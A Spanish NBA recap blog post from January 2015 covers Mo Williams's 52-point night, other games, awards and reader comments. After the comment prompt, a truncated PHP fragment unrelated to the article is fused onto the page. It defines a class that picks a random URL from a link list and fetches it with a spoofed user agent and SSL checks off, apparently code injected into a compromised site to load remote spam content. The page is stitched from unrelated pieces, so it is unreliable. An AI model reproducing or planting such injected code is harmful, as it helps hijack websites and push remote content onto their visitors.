La crónica: Air Williams

14 de January de 2015 por MagicJohnson32

Quién nos iba a decir que hoy encabezaríamos la crónica con el Wolves-Pacers. Agradezcamos por ello a Mo Williams, autor de una actuación que eclipsa el regreso de LeBron en otra derrota de los Cavs, el triple doble de Horford, la agónica victoria de los Mavs en Sacramento, otra muesca más en el cinturón de los Warriors o el final de la maldición que parecía perseguir a los Wizards ante los Spurs.

Pero no os preocuéis, que os lo contamos todo.

mowill

Minnesota Timberwolves 110 – Indiana Pacers 101

Lo vivido anoche en el Bankers Life Fieldhouse de Indianapolis fue una de esas extrañas ocasiones en las que un jugador parece poseído por los espíritus del baloncesto y no hay nada ni nadie capaz de frenarlo. Lo más sorprendente es que el jugador en cuestión fue Mo Williams, firmante de la mejor actuación ofensiva de la temporada, 52 puntos, que también son su máximo como profesional, el récord de la franquicia (superó los 51 de Love y Brewer) y la mayor anotación de un jugador visitante en el pabellón de los Pacers. Prácticamente cada punto anotado por Williams fue imprescindible para dar a los Wolves una victoria que rompe una racha negativa que ya se extendía a 15 partidos. Recomendamos encarecidamente la visión del vídeo resumen de la histórica actuación de Mo Williams, con algunas canastas verdaderamente increíbles.

San Antonio Spurs 93 – Washington Wizards 101

17 derrotas seguidas sumaban los Wizards sobre los Spurs. Desde 2005 no ganaban los capitalinos a los texanos. La racha se acabó anoche, cortesía de John Wall y de unos minutos fantásticos de Kevin Seraphin, autor de 9 puntos consecutivos que pavimentaron el camino a la victoria por parte de los locales. Dos pérdidas consecutivas de Ginóbili acabaron con las opciones finales de los Spurs, que de nuevo echaron por tierra en los momentos finales un buen encuentro que, de otra manera, podrían haberse llevado.

Dallas Mavericks 108 – Sacramento Kings 104 (OT)

DeMarcus Cousins caminaba lentamente hacia el banquillo, esforzándose por contener la rabia después de que le señalasen la 6ª falta personal a 21 segundos para el final cuando intentaba recibir en el poste. El marcador era de empate a 99 y Cousins tenía toda la intención de coronar su inmensa actuación (32 puntos, 16 rebotes, 9 asistencias) con el game winner. El flop de Tyson Chandler le costó la eliminación a Cousins y, tras una prórroga, la victoria a los Kings, que sin su jugador franquicia (y sin Gay, que se marchó lesionado en el primer cuarto) se derrumbaron en el tiempo extra, cuando el dúo Rondo-Ellis se mostró más dominante. Los Mavs pudieron finalmente celebrar una victoria después de caer ante Pistons y Clippers, pero siguen teniendo mucho margen para la mejora.

Cleveland Cavaliers 100 – Phoenix Suns 107

LeBron James regresó tras el período de baja más largo de toda su carrera, y en el plano individual fue como si nunca se hubiera ido. Sin embargo, sus 33 puntos no evitaron otra derrota de los Cavs, en esta ocasión en Phoenix, la sexta seguida y novena en los últimos diez partidos. Con JR Smith como mejor aliado de James, Cleveland remontó una desventaja de 19 puntos y llegó a situarse por delante pero Markieff Morris aprovechó la debilidad interior de los Cavs y los Suns cerraron el partido con un 11-3, todo ello con Kevin Love en el banco los últimos 16 minutos de partido.

Resto de la jornada

A velocidad de crucero y sin mirar atrás viajan los Warriors, inmersos en una nueva racha de victorias (ya van 7 seguidas) y líder indiscutible de lo que va de curso. Anoche ganaron en el EnergySolutions Arena de Salt Lake City, donde apenas rompieron a sudar: ningún jugador visitante llegó a los 30 minutos, y aun así Steph Curry tuvo tiempo de anotar 27 puntos y repartir 11 asistencias. En la otra punta del país pero compartiendo condición de líder de conferencia habitan los Hawks. Anoche visitaban Philadelphia y Budenholzer se permitió hacer un Popovich (como alumno aventajado del maestro Pops que es): dio descanso a Teague, Carroll y Millsap, consciente de que no los necesitaría para tumbar a los Sixers. Por supuesto, acertó (105-87) y Horford aprovechó la ocasión para lograr su primer triple doble (21-10-10). El espanto de la noche, partido que cerró la jornada y nuestra crónica, fue la victoria de los Heat en el Staples sobre los Lakers (78-75), donde apenas se puede destacar la lesión muscular de Wade, el 3 de 19 en tiros de Kobe y, por encima de todo, otra fantástica actuación de Hassan Whiteside con 15 puntos, 9 rebotes y 5 tapones.

PREMIOS

MVP: Pese a que ha habido muy buenas actuaciones esta madrugada, hoy no hay premio compartido. MVP más que merecido para Mo Williams por sus 52 puntos con 19 de 33  en tiros, 7 asistencias y 4 rebotes.

Rookie: Wiggins volvió a alcanzar los 20 puntos (7 de 16 en tiros), y los acompañó con 3 rebotes, 4 asistencias y 1 tapón. Un pasito más hacia el RoY.

Sorpresa: Hay que empezar a preguntarse si Hassan Whiteside ha llegado para quedarse. Anoche, 15 puntos, 9 rebotes y 5 tapones en apenas 21 minutos de juego para el center de los Heat.

Decepción: Los 6 rebotes y 7 asistencias no disimulan el horror del 3 de 19 en tiros de Kobe. No se queda atrás Kyrie Irving, que remató una noche pésima en el tiro (9 puntos y 4 de 14 en tiros) con 8 pérdidas de balón.

Mayor esfuerzo en vano: DeMarcus Cousins hizo (casi) todo lo posible para dar a victoria a los Kings pero dos faltas en el último minuto echaron por la borda sus 32 puntos, 16 rebotes, 9 asistencias, 2 robos y 1 tapón. Por ello, y porque se contuvo cuando le echaron por faltas, le perdonamos las 9 pérdidas de balón.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. jhc dice:
    #1

    Impresionante el patido de mo williams le entraba absolutamente todo!!

    Ttambien víel partido de mis Hawks, que ya nos permitimos hasta hacer descansar titulares y aún asín seguir ganando, estamos enrachados y el buen juego continua como seña de identidad

      Citar

  2. Azabel dice:
    #2

    Lo de whiteside ya es cosa seria seria, no solo sus numeros lo he visto y ha jugado excelente, el Heat con el
    ? El regreso de sus multiples lesionados y bosh y chalmers en este nivel son una alternativa en el este a los 8uatro punteros

      Citar

  3. luismi_vallecas dice:
    #3

    cuando firmó miami a hassan whiteside? está dando un rendimiento increíble en estos últimos partidos

      Citar

  4. Ruxixón dice:
    #4

    Y en la hoops tela,que es abrir el portal de la liga y noche que juega noche que aparece entre los 3 más destacados Whiteside.A ver lo de Love que da de sí,que chupar todo el último cuarto desde el banquillo,las declaraciones que no vales un máximo,etc,etc…está ahora mismo en el punto más importante de la temporada.El partido un poco mentirosillo,mucha superioridad de Phoenix que se dejó comer la tostada en los últimos segundos del tercer cuarto con 5 puntos regalados que metieron a Cleveland de lleno en la lucha por la victoria.Luego entre canasta y canasta estuvieron ahí pero sensaciones las mismas de siempre.Si,JR te mejora a Waiters en plan que puede tener un punto más de experiencia,pero vaya.Mozgov muy muy blandito,en los dos lados de la cancha.Y que Markief Morris haga el partido de su vida es para mirárselo,sea Love o LeBron su defensor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>